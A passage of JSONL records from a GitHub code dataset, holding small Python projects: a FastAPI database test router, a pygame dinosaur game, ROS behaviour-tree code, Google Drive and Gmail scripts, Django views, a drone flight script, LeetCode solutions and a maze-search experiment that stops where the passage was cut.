else:\r\n return False\r\ndef circle(r):\r\n print(math.pi * math.pow(r, 2))\r\ndef rectangle(a, b):\r\n print(a*b)\r\ndef check_the_figure(name):\r\n if name == 
\"треугольник\" :\r\n side1 = int(input(\"1 сторона: \"))\r\n side2 = int(input(\"2 сторона: \"))\r\n side3 = int(input(\"3 сторона: \"))\r\n if check_triangle(side1, side2, side3): \r\n triangle(side1, side2, side3)\r\n else :\r\n print(\"Треугольник не может существовать\")\r\n elif name == \"круг\" :\r\n r = int(input(\"Радиус круга: \"))\r\n circle(r)\r\n elif name == \"прямоугольник\" :\r\n a = int(input(\"1 сторона прямоугольника: \"))\r\n b = int(input(\"2 сторона прямоугольника: \"))\r\n rectangle(a, b)\r\ncheck_the_figure(input(\"Введите название фигуры(треугольник,круг,прямоугольник): \"))\r\n","repo_name":"Aquilez-brinko/Kfund-Python","sub_path":"16practical.py","file_name":"16practical.py","file_ext":"py","file_size_in_byte":4536,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1246453733","text":"from fastapi import APIRouter, Query\nfrom db import Mongo, AMZRDS\nimport model\n\nrouter = APIRouter(\n prefix=\"/test\",\n)\n\n@router.get(\"/db/{db_type}\")\n# 测试数据库读\ndef get_db(db_type: str, id=Query(1)):\n if db_type == 'mongo':\n client = Mongo()\n print(client)\n conn = client.get_connection()\n # 读取 test 集合的指定 id 数据\n data = conn.test.find_one({\"_id\": id})\n elif db_type == 'mysql':\n client = AMZRDS()\n print(client)\n conn = next(client.get_connection())\n # 读取 test 表的指定 id 数据\n data = conn.query(model.Test).filter(model.Test.id == id).first()\n\n return {\n \"data\": data\n }\n\n\n@router.post(\"/db/{db_type}\")\n# 测试数据库写\ndef set_db(db_type: str, id=Query(1), val=Query(\"test\")):\n if db_type == 'mongo':\n conn = Mongo().get_connection()\n # 写入 test 集合的指定 id 数据\n conn.test.update_one({\"_id\": id}, {\"$set\": {\"val\": val}}, upsert=True)\n elif db_type == 'mysql':\n conn = next(AMZRDS().get_connection())\n # 写入 test 表的指定 id 数据\n obj = conn.query(model.Test).filter(model.Test.id == id).first()\n if obj is not None:\n conn.query(model.Test).filter(\n model.Test.id == id).update({\"val\": val})\n else:\n obj = model.Test(val)\n conn.add(obj)\n conn.commit()\n\n return {\n \"state\": \"success\"\n }","repo_name":"KKCHANNEL-kk/easetrip-service","sub_path":"router/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74724157985","text":"##########################################\n\"\"\"\nLab:8 Objectives\n- Have Different Obstacles\n\"\"\"\n##########################################\nimport pygame\nfrom dinoGame.elements import Track, Dinosaur, Cloud\nfrom dinoGame.elements import LargeCactus, Bird, SmallCactus\n\n# Initialize Pygame\npygame.init()\n\nSCREEN_HEIGHT = 600 # Enter the window Height\nSCREEN_WIDTH = 1100 # Enter the window Width\nSCREEN = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\n\nalive = True\n\ntotal_score = 0\n\nwhile alive:\n\n SCREEN.fill((255, 255, 255))\n font = pygame.font.Font('freesansbold.ttf', 30)\n text = font.render(\"Press any Key to Start\", True, (0, 0, 0))\n textRect = text.get_rect()\n textRect.center = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 3)\n SCREEN.blit(text, textRect)\n\n text_score = font.render(f\"Score: {total_score}\", True, (0, 0, 0))\n score_Rect = text_score.get_rect()\n score_Rect.center = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 1.5)\n SCREEN.blit(text_score, score_Rect)\n\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n alive = False\n elif event.type == pygame.KEYDOWN:\n ## Start Game\n ground = Track(SCREEN)\n dino = Dinosaur(SCREEN)\n cloud = Cloud(SCREEN)\n clock = pygame.time.Clock()\n obstacle = None\n\n game_score = 0\n\n run = True\n while run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n continue\n ##########Have Different Obstacles#########\n if obstacle == None:\n obstacle = LargeCactus(SCREEN)\n ###########################################\n\n ## Update The Elements\n user_input = pygame.key.get_pressed()\n dino.update(user_input)\n ground.update()\n cloud.update()\n obstacle.update()\n\n ### Draw All Layers\n SCREEN.fill((255,255,255))\n ground.draw()\n dino.draw()\n cloud.draw()\n obstacle.draw()\n\n if dino.dino_rect.colliderect(obstacle.rect):\n total_score = game_score\n break\n\n if obstacle.rect.x <= -obstacle.rect.width:\n obstacle = None\n game_score += 1\n\n text = font.render(\"Points: \" + str(game_score), True, (0, 0, 0))\n textRect = text.get_rect()\n textRect.center = (SCREEN_WIDTH/2, SCREEN_HEIGHT/4)\n SCREEN.blit(text, textRect)\n\n clock.tick(30)\n pygame.display.update()\npygame.quit()","repo_name":"harshmittal2210/PyCon2023-YLW","sub_path":"Tutorials/6_Game/lab8.py","file_name":"lab8.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"40672637788","text":"from pymongo import MongoClient\nfrom flask import Flask, render_template, redirect\nimport scrape_mars\n\nmongo = MongoClient(\"mongodb://localhost:27017/mars_db\")\n\napp = Flask(__name__)\n\n# Create route to query mongoDB and pass data into html template\n@app.route(\"/\")\ndef index ():\n\n final_dict = mongo.db.mars_data.find_one()\n return render_template(\"index.html\", data=final_dict) \n\n@app.route(\"/scrape\")\ndef scrape():\n\n scrape_data = scrape_mars.scrape()\n mongo.db.mars_data.update({}, scrape_data, upsert=True)\n return redirect (\"/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n\n","repo_name":"brianroberts778/Mars_NASA_Web_Scraper","sub_path":"Mission_to_Mars/mars_app.py","file_name":"mars_app.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"21698908474","text":"import rospy\nimport py_trees\nimport py_trees_ros\nimport threading\nfrom project11_msgs.msg import BehaviorInformation\nfrom geographic_msgs.msg import GeoPoseStamped\nfrom nav_msgs.msg import Odometry\nimport time\n\nbhv_bb = py_trees.blackboard.Blackboard()\n\n# Set up some test variables to artificaily set states for debugging.\ntestvalues = {'debug': True,\n 'emergency': False,\n 'location_unknown':True,\n 'on_surface': True}\n\nfor k,v in testvalues.items():\n bhv_bb.set('test.'+k,v, overwrite=True)\n\n# This class inherits the py_trees_ros.subscribers.ToBlackboard object, \n# allowing one to create a blackboard separately and provide it, rather \n# than creating one on the fly. In this version of py_trees/py_trees_ros\n# there is no Client object for access the blackboard created with the \n# standard ToBlackboard() object. \nclass ToLocalBlackboard(py_trees_ros.subscribers.ToBlackboard):\n def __init__(self,blackboard,**kwargs):\n super(ToLocalBlackboard,self).__init__(**kwargs)\n self.ourblackboard = blackboard\n\n def setup(self, timeout):\n ret = super(ToLocalBlackboard,self).setup(timeout)\n # Resets the blackboard to our blackboard.\n self.blackboard = self.ourblackboard\n return ret\n \n def update(self,**kwargs):\n ret = super(ToLocalBlackboard,self).update(**kwargs)\n if self.name=='behaviorparam2BB':\n print(self.subscriber.get_num_connections())\n print(self.msg)\n print(self.topic_name)\n print(self.name + \":\" + self.feedback_message)\n print(ret)\n #ret = py_trees.common.Status.SUCCESS\n return ret\n\n\nclass ToBB(py_trees.behaviour.Behaviour):\n ''' A class to write data from ROS messages to the py_trees blackboard.\n\n TODO: This was written out of frustration (see NOTE), and has all the \n subscribers hard-coded. It should be rewritten, submitting topics and \n message types to __init__().\n \n NOTE:\n This Behavior combines all the data acquisiton subscribers into one behavior \n writing their data to the blackboard. In this version of py_trees_ros/py_trees\n every attempt to use ToBlackboard() above with multiple behaviors, one for each\n subscriber failed. Data would be written by the fast data rate topics but omitted\n for the slow data rate topics. If the slow data rate topic is placed first in the \n sequence, no data would be written to the blackbaord at all. The cause for these\n problems might be in the architecture of the data acquisition branch of the tree\n (sequential vs parallel elements, memory=True/False, etc.), but every attempt \n resulted in failed attempts to get data into the blackboard reliably. My \n suspicion is that the thread lock (self.wireguard below) might have been\n monopolized by the high data rate topics and by combining the posting to the\n blackboard into a single threadlock here, the problem is solved. 
Not sure.\n'''\n def __init__(self, blackboard,**kwargs):\n\n super(ToBB,self).__init__(**kwargs)\n # Debugging tool.\n self.feedback_messages = {'bhvinfo':None,\n 'mesopos':None,\n 'asvinfo':None}\n # Place where messages received by subscribers are held.\n self.msgs = {'bhvinfo':None,\n 'mesopos':None,\n 'asvinfo':None}\n \n self.blackboard = blackboard\n self.data_guard = threading.Lock()\n\n self.input_subscriber = None\n self.mesobot_subscriber = None\n self.asv_subscriber = None\n\n # Will get the whole message\n self.blackboard_variable_mapping = {\"blackboard_variables\":None}\n self.clearing_policy = None\n\n def setup(self,timeout):\n self.input_subscriber = rospy.Subscriber('project11/behaviors/mesobot/input',\n BehaviorInformation,\n self.inputCB,\n queue_size=10)\n self.mesobot_subscriber = rospy.Subscriber('/project11/mesobot/nav/position',\n GeoPoseStamped,\n self.mesoCB,\n queue_size=10)\n self.asv_subscriber = rospy.Subscriber('project11/odom',\n Odometry,\n self.asvCB,\n queue_size=10)\n \n '''\n # Sets an empty set of data on setup.\n self.msgs['bhvinfo'] = BehaviorInformation()\n self.msgs['mesoinfo'] = GeoPoseStamped()\n self.msgs['asvinfo'] = Odometry()\n self.update()\n '''\n \n\n return True\n\n def inputCB(self,msg):\n #with self.data_guard:\n # self.msgs['bhvinfo'] = msg\n self.msgs['bhvinfo'] = msg\n \n def mesoCB(self,msg):\n #with self.data_guard:\n # self.msgs['mesoinfo'] = msg\n self.msgs['mesopos'] = msg\n\n def asvCB(self,msg):\n #with self.data_guard:\n # self.msgs['asvinfo'] = msg\n self.msgs['asvinfo'] = msg\n \n def update(self):\n \n haveMsgs = False\n for k, msg in self.msgs.items():\n if msg is not None:\n haveMsgs = True\n if not haveMsgs:\n return py_trees.common.Status.RUNNING\n \n \n # Look at self.msgs for new items.\n with self.data_guard:\n for kk, msg in self.msgs.items():\n #print(kk)\n #print(msg)\n\n # This code is directly from py_trees_ros/subscribers.py with only\n # msg = self.msg changed. It should apply the messages to the\n # blackboard within one \"data_guard\" mutex rather than individual ones.\n if msg is None:\n self.feedback_message = \"no \" + kk + \" message received yet\"\n #return py_trees.common.Status.RUNNING\n else:\n \n self.blackboard.set(kk, msg, overwrite=True)\n self.feedback_message = \" saved incoming message: \" + kk\n #if kk == 'bhvinfo':\n # print(msg)\n # this is of dubious worth, since the default setting of ClearingPolicy.ON_INITIALISE\n # covers every use case that we can think of.\n if self.clearing_policy == py_trees.common.ClearingPolicy.ON_SUCCESS:\n msg = None\n msg = None\n \n #print(time.asctime() + self.feedback_message)\n\n return py_trees.common.Status.SUCCESS\n","repo_name":"valschmidt/mesobot_behavior","sub_path":"src/mesobot_blackboard.py","file_name":"mesobot_blackboard.py","file_ext":"py","file_size_in_byte":6847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
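The NOTE in ToBB argues for funneling every subscriber write through one lock; the same pattern distilled outside ROS, with hypothetical names:

import threading

class MessageCache:
    def __init__(self):
        self._lock = threading.Lock()
        self._msgs = {}

    def put(self, key, msg):
        # Called from many subscriber threads; one lock serializes all writes.
        with self._lock:
            self._msgs[key] = msg

    def snapshot(self):
        # The same lock covers reads, so the consumer sees a consistent view.
        with self._lock:
            return dict(self._msgs)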
+{"seq_id":"9789648862","text":"from pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\n\n#this function gets our google drive info/credentials so we can use it\n#allows us to return the \"drive\" so we can upload/download stuff as needed\ndef client_auth():\n gauth = GoogleAuth()\n gauth.LoadCredentialsFile(\"user.txt\") #try to load credentials for gdrive\n\n if gauth.credentials is None:\n #we need to get them if they arent able to be loaded\n gauth.LocalWebserverAuth() # Creates local webserver and auto handles authentication.\n elif gauth.access_token_expired:\n gauth.Refresh()\n #refresh the creds if necessary\n else:\n gauth.Authorize()\n #using saved credentials and moving on\n gauth.SaveCredentialsFile(\"user.txt\")\n #this saves our credentials so we dont pop the webpage every opening\n\n drive = GoogleDrive(gauth)\n return drive #return usable list file\n\n#function to create our folder, to have stability within a users gdrives\n#default name is \"CalData\"\ndef create_folder():\n drive = client_auth()\n folder_metadata = {'title' : 'CalData', 'mimeType' : 'application/vnd.google-apps.folder'}\n folder = drive.CreateFile(folder_metadata)\n folder.Upload()\n\n#creates our .json file for our task data\ndef create_db():\n drive = client_auth()\n data = drive.CreateFile({'title': 'task_db.json'})\n data.Upload()\n return data['id'] # this is how you access file id\n #the id is returned so ideally we can keep track of this easily\n #probably write it to a file to easily parse in\n #file ID's dont mean too much security wise so its not \n\n#function to find our db folder\n#this function only searches the root directory \ndef find_db(): # this function finds if the file exists by search via ID\n drive = client_auth()\n file_list = drive.ListFile({'q': \"'root' in parents and trashed=false\"}).GetList()\n\n status = 0 #placeholder for the id\n\n for file1 in file_list:\n #print('title: %s, id: %s' % (file1['title'], file1['id']))\n if file1['title'] ==\"CalData\":\n status = file1['id'] #ripping the id string\n \n return status\n \n #need to find our db file by its gdrive ID\n\n#function creates a file within the folder specified by that hardcoded id\n#change this to be dynamic later\ndef db_to_folder():\n drive = client_auth()\n folder_id = find_db()\n file1 = drive.CreateFile({'title':'task_db.json', 'mimeType':'text/csv',\n \"parents\": [{\"kind\": \"drive#fileLink\",\"id\": folder_id}]})\n file1.Upload()\n\n#function to list what is in a folder\n#should find the db file id so we can use this function and pass it to the update db function\ndef ListFolder():\n drive = client_auth()\n filelist=[] #list of our files\n folder_id = find_db() #get our folder id\n file_list = drive.ListFile({'q': \"'%s' in parents and trashed=false\" % folder_id}).GetList()\n \n #iterate through the folder to find all our ids\n for f in file_list:\n if f['mimeType']=='application/vnd.google-apps.folder': # if folder\n filelist.append({\"id\":f['id'],\"title\":f['title'],\"list\":ListFolder(f['id'])})\n else:\n filelist.append({\"id\":f['id'],\"title\":f['title'],\"title1\":f['alternateLink']})\n \n db_file_id = 0 # temp for the file id\n for files in file_list:\n if files[\"title\"] == \"task_db.json\":\n db_file_id = files['id']\n\n return db_file_id\n\n#NEED TO GET THE DB FILE ID BEFORE USING THIS IN SHIPPABLE\n#function to update db file within subfolder, given the id of the file\ndef update_db():\n drive = client_auth()\n id = ListFolder()\n 
a=drive.auth.service.files().get(fileId=id).execute()\n a['title']=\"task_db.json\"\n file1 = drive.CreateFile({'id': id})\n content = file1.GetContentString()\n #this data allows us to test inserting to the json and updating it\n data = input(\"test string here:\")\n if data == \"delete\":\n file1.SetContentString(\"null\")\n else:\n file1.SetContentString(data)\n file1.Upload()\n \n update=drive.auth.service.files().update(fileId=id,body=a).execute()\n\n#download file based on file id\ndef download_db():\n file_id = ListFolder() # finds our database file id within its subfolder\n drive = client_auth()\n download_file = drive.CreateFile({'id': file_id})\n download_file.GetContentFile(\"task_db.json\") #downloading the file, \n\ndef main():\n create_folder()#create the directory\n db_to_folder() #establish our folder and create the db file within\n update_db() #update that db file\n download_db() #download back to houston\n\nif __name__ == '__main__':\n main()","repo_name":"alm0st907/simple_cal","sub_path":"source/gd_api/up_code.py","file_name":"up_code.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14077853333","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.core.exceptions import ValidationError\nfrom .models import Profile\n\n\nclass RegistrationForm(UserCreationForm):\n email = forms.EmailField(required=True)\n\n class Meta:\n model = User\n fields = (\n 'username',\n 'first_name',\n 'last_name',\n 'email',\n 'password1',\n 'password2',\n )\n\n def save(self, commit=True):\n user = super(RegistrationForm, self).save(commit=False)\n user.first_name = self.cleaned_data['first_name']\n user.last_name = self.cleaned_data['last_name']\n user.email = self.cleaned_data['email']\n\n if commit:\n user.save()\n return user\n\n def clean_email(self):\n email = self.cleaned_data['email']\n if User.objects.filter(email=email).exists():\n raise ValidationError(\"Email already exists\")\n return email\n\n\nclass EditProfileForm(UserChangeForm):\n class Meta:\n model = User\n fields = (\n 'first_name',\n 'last_name',\n 'email',\n )\n\n\nclass ProfileForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ('bio', 'mobile_number', 'gender', 'image')\n","repo_name":"momanyibiffon/Stock-Management-System---Django-web-App","sub_path":"accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1245966754","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom webapp.models import Article, STATUS_CHOICES\nfrom django.http import HttpResponseNotAllowed, Http404\n\nfrom webapp.models import Article, STATUS_CHOICES\nfrom webapp.forms import ArticleForm\n\n\ndef index_view(request):\n\n articles = Article.objects.all()\n context = {\n 'articles': articles\n }\n return render(request, 'index.html', context)\n\n\ndef article_create(request, pk):\n # try:\n # article = Article.objects.get(pk=pk)\n # except Article.DoesNotExist:\n # raise Http404\n\n article = get_object_or_404(Article, pk=pk)\n\n context = {'article': article}\n return render(request, 'article_create.html', context)\n\n\ndef article_view(request):\n if request.method == \"GET\":\n return render(request, 'article_view.html', context={\n 'form': ArticleForm()\n })\n elif request.method == 'POST':\n form = ArticleForm(data=request.POST)\n if form.is_valid():\n article = Article.objects.create(\n description=form.cleaned_data['description'],\n maxdescription=form.cleaned_data['maxdescription'],\n status=form.cleaned_data['status'],\n date_completion=form.cleaned_data['date_completion']\n )\n return redirect('article_create', pk=article.pk)\n else:\n return render(request, 'article_view.html', context={\n 'form': form\n })\n else:\n return HttpResponseNotAllowed(permitted_methods=['GET', 'POST'])\n\ndef article_update_view(request, pk):\n article = get_object_or_404(Article, pk=pk)\n if request.method == \"GET\":\n form = ArticleForm(initial={\n 'description': article.description,\n 'maxdescription': article.maxdescription,\n 'status': article.status,\n 'date_completion': article.date_completion\n })\n return render(request, 'article_update.html', context={\n 'form': form,\n 'article': article\n })\n elif request.method == 'POST':\n form = ArticleForm(data=request.POST)\n if form.is_valid():\n # Article.objects.filter(pk=pk).update(**form.cleaned_data)\n article.description = form.cleaned_data['description']\n article.maxdescription = form.cleaned_data['maxdescription']\n article.status = form.cleaned_data['status']\n article.date_completion = form.cleaned_data['date_completion']\n article.save()\n return redirect('article_create', pk=article.pk)\n else:\n return render(request, 'article_update.html', context={\n 'article': article,\n 'form': form\n })\n else:\n return HttpResponseNotAllowed(permitted_methods=['GET', 'POST'])\n\ndef article_delete_view(request, pk):\n article = get_object_or_404(Article, pk=pk)\n if request.method == 'GET':\n return render(request, 'article_delete.html', context={'article': article})\n elif request.method == 'POST':\n article.delete()\n return redirect('index')\n\n\n\n\n\n","repo_name":"DaryaNov/homework45","sub_path":"source/webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4548474460","text":"class Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n island = []\n count = 0\n # def check_connected(x,y):\n # # print (f\"cordinates: {x,y}\")\n # # print (island)\n # for land in island:\n # if x>=1 and grid[x-1][y]==\"1\" and (x-1,y) in land:\n # # print(\"1\")\n # land.add((x,y))\n # return\n # if y>0 and grid[x][y-1]==\"1\" and (x,y-1) in land:\n # # print (\"2\")\n # land.add((x,y))\n # return\n # # print (\"3\")\n # tmp_set = set()\n # tmp_set.add((x,y))\n # island.append(tmp_set)\n def dfs(x,y):\n if x<0 or y<0 or y>=len(grid[0]) or x>=len(grid) or grid[x][y]!=\"1\":\n return\n grid[x][y]=\"#\"\n dfs(x-1,y)\n dfs(x+1,y)\n dfs(x,y+1)\n dfs(x,y-1)\n for x in range(len(grid)):\n for y in range(len(grid[0])):\n if grid[x][y]==\"1\":\n dfs(x,y)\n count+=1\n # print (len(island))\n return count","repo_name":"hasija/leetcode","sub_path":"200. Number of Islands.py","file_name":"200. Number of Islands.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10323455147","text":"import inspect\n\nimport pytest\n\nfrom telethon import TelegramClient\n\n\n@pytest.mark.asyncio\nasync def test_send_message_with_file_forwards_args():\n arguments = {}\n sentinel = object()\n\n for value, name in enumerate(inspect.signature(TelegramClient.send_message).parameters):\n if name in {'self', 'entity', 'file'}:\n continue # positional\n\n if name in {'message'}:\n continue # renamed\n\n if name in {'link_preview'}:\n continue # make no sense in send_file\n\n arguments[name] = value\n\n class MockedClient(TelegramClient):\n # noinspection PyMissingConstructor\n def __init__(self):\n pass\n\n async def send_file(self, entity, file, **kwargs):\n assert entity == 'a'\n assert file == 'b'\n for k, v in arguments.items():\n assert k in kwargs\n assert kwargs[k] == v\n\n return sentinel\n\n client = MockedClient()\n assert (await client.send_message('a', file='b', **arguments)) == sentinel\n","repo_name":"LonamiWebs/Telethon","sub_path":"tests/telethon/client/test_messages.py","file_name":"test_messages.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":8393,"dataset":"github-code","pt":"70"}
+{"seq_id":"39428932348","text":"class Solution(object):\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n answer = []\n if len(nums) == 0:\n return answer\n \n res = []\n answer.append(list(res))\n self.dfs(nums, len(nums), 0, res, answer)\n \n return answer\n \n def dfs(self, nums, length, index, res, answer):\n if len(res) == length:\n return\n \n for i in range(index, length):\n res.append(nums[i])\n answer.append(list(res))\n self.dfs(nums, length, i + 1, res, answer)\n res.pop()\n","repo_name":"alen6697/leetcode-practice","sub_path":"Subsets.py","file_name":"Subsets.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41523124246","text":"import sys\nimport ssl\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\nfrom app import config\n\n\ndef format_message(sender: str,\n receiver: str,\n subject: str,\n promotions: list[tuple[str]]) -> str:\n message = MIMEMultipart('alternative')\n message['Subject'] = subject\n message['From'] = sender\n message['To'] = receiver\n\n promos_text = '\\n'.join([(f'{p[0]} -> {p[1]}')\n for p in promotions])\n promos_html = '\\n'.join([(f'{p[0]} ')\n for p in promotions])\n\n text = f\"\"\"\\\nOlá! 😃\nForam encontradas novas ofertas para o produto que você estava monitorando.\nVocê pode conferi-las aqui:\n {promos_text}\n \"\"\"\n html = f\"\"\"\\\n\n \n Olá! 😃 \n Foram encontradas novas ofertas para o produto que você estava monitorando. \n Você pode conferi-las aqui:\n
\n
\n \n\n \"\"\"\n # Turn these into plain/html MIMEText objects.\n part1 = MIMEText(text, 'plain')\n part2 = MIMEText(html, 'html')\n # Add HTML/plain-text parts to MIMEMultipart message.\n # The email client will try to render the last part first.\n message.attach(part1)\n message.attach(part2)\n return message.as_string()\n\n\ndef send_email(sender: str,\n receiver: str,\n password: str,\n subject: str,\n promotions: list[tuple[str]]) -> None:\n message = format_message(sender, receiver, subject, promotions)\n context = ssl.create_default_context()\n try:\n with smtplib.SMTP_SSL('smtp.gmail.com', 465, context=context) as s:\n s.login(sender, password)\n s.sendmail(sender, receiver, message)\n except Exception as err:\n # Break point, can’t continue if email is not sent.\n config.LOGGER.error(f'{err}')\n sys.exit()\n","repo_name":"willy-r/jovem-padawan","sub_path":"app/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
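format_message can be exercised offline since it only builds a MIME string; the addresses and offers below are placeholders, and format_message is assumed to be in scope:

promotions = [('Gadget X', 'https://example.com/offer/1'),
              ('Gadget X (refurb)', 'https://example.com/offer/2')]
msg = format_message('bot@example.com', 'user@example.com',
                     'New offers found', promotions)
print(msg[:200])  # headers first, then the plain-text and HTML parts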
+{"seq_id":"35768832267","text":"import time\nfrom pyardrone import ARDrone, at\nimport ThreadDistance\ndef init():\n uav = ARDrone()\n uav.navdata_ready.wait()\n print(\"ready\")\n uav.send(at.CONFIG('general:navdata_demo', True))\n time.sleep(0.1)\n print(\"send\")\n while uav.state.emergency_mask:\n print(\"emergency\")\n uav.send(at.REF(0b0100000000))\n time.sleep(1)\n print(\"ready\")\n return uav\n\n\ndef get_data(drone): #get money, get bitches, get DATA <3\n altitude = drone.navdata.demo.altitude\n vx = drone.navdata.demo.vx\n vy = drone.navdata.demo.vy\n vz = drone.navdata.demo.vz\n phi = drone.navdata.demo.phi\n psi = drone.navdata.demo.psi\n theta = drone.navdata.demo.theta\n return (altitude, vx, vy, vz, phi, psi, theta)\n\n\ndef data_print(drone, previous_data):\n current_data = get_data(drone)\n if (previous_data!=current_data):\n print(\"Altitude: \", previous_data[0], \"\\t vx: \", previous_data[1], \"\\t vy: \", previous_data[2], \"\\t vz: \", previous_data[3], \"\\t phi: \", previous_data[4], \"\\t psi: \", previous_data[5],\n \"\\t theta: \", previous_data[6])\n return(current_data)\n\ndrone = init()\nprint(\"connecting\")\nprevious_data = get_data(drone)\n\nprevious_data = data_print(drone, previous_data)\n\nspeed = 0.1\nActionTime = 2\nSleepTime = 1\n\nwhile not drone.state.fly_mask:\n drone.takeoff()\n print(\"Vlieg op!\")\n\nprint(\"JA baas\")\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime*3)\n\nprint(\"Omhoog\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(up=speed*4)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(up=0)\n break\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime)\n\nprint(\"Vooruit met die geit\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(forward=speed)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(forward=0)\n break\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime)\n\nprint(\"Rechts\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(right=speed)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(right=0)\n break\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime)\n\nprint(\"en een stapje terug\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(backward=speed)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(backward=0)\n break\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime)\n\nprint(\"Links\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(left=speed)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(left=0)\n break\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime)\n\nprint(\"Omlaag\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(down=speed*4)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(down=0)\n break\n\nprint(\"klaar\")\n\nwhile drone.state.fly_mask:\n drone.land()\n # print(\"ga landen maat\")\n\nprint(\"doei\")\n\nprevious_data = data_print(drone, previous_data)\nexit()\n","repo_name":"kwint/UAV-test","sub_path":"Nextcloud/1. School/UAV/UseDataToMove.py","file_name":"UseDataToMove.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"13803260754","text":"import sys\nimport time\nimport math\nfrom tqdm import tqdm\nimport json\nimport os\n\n\nfrom project2_config import PS, NUM_EXPERIMENT\nfrom algorithm import RepeatedForwardAStar\n\nsys.path.append('..\\\\..\\\\XLQ_test\\\\Final_version')\nfrom algorithm import AStar\nfrom maze_1 import Cell, Maze\n\n\ndef euclidean_heuristic(cell1: Cell, cell2: Cell):\n x1, y1 = cell1.position\n x2, y2 = cell2.position\n return math.sqrt(math.pow((x1 - x2), 2) + math.pow((y1 - y2), 2))\n\n\ndef format_path_data(data_path):\n formated_path=[]\n for data in data_path:\n formated_path.append(data.get_position())\n return formated_path\n\ndef test(dim: int, num_experiment=NUM_EXPERIMENT):\n # data=[0]*len(Q9_QS)\n # print(Q9_QS)\n # print(data)\n data_time_bump = [0.0] * len(PS)\n data_path_bump = [0.0] * len(PS)\n data_time_repeat = [0.0] * len(PS)\n data_path_repeat = [0.0] * len(PS)\n\n record_path_in_bump=[]\n record_path_in_repeat=[]\n\n for index_p, p in enumerate(PS):\n count = 0\n sub_record_path_in_bump=[]\n sub_record_path_in_repeat = []\n for random_seed in tqdm(range(num_experiment)):\n maze = Maze(dim, dim)\n maze.initialize_maze(p, random_seed=random_seed)\n goal_cell = Cell((dim - 1, dim - 1))\n start_cell = Cell((0, 0))\n astar_search=AStar(maze, euclidean_heuristic)\n astar_path=astar_search.search(start_cell, goal_cell)\n if len(astar_path)==0:\n continue\n count+=1\n repeat_forward_astar=RepeatedForwardAStar(maze, euclidean_heuristic)\n\n start_time=time.time()\n path_repeat=repeat_forward_astar.search(start_cell, goal_cell)\n time_repeat=time.time()-start_time\n\n start_time=time.time()\n path_bump=repeat_forward_astar.search(start_cell, goal_cell, only_bump=True)\n time_bump=time.time()-start_time\n\n data_time_repeat[index_p]+=time_repeat\n data_time_bump[index_p]+=time_bump\n\n data_path_repeat[index_p]+=len(path_repeat)\n data_path_bump[index_p]+=len(path_bump)\n\n sub_record_path_in_repeat.append(format_path_data(path_repeat))\n sub_record_path_in_bump.append(format_path_data(path_bump))\n\n 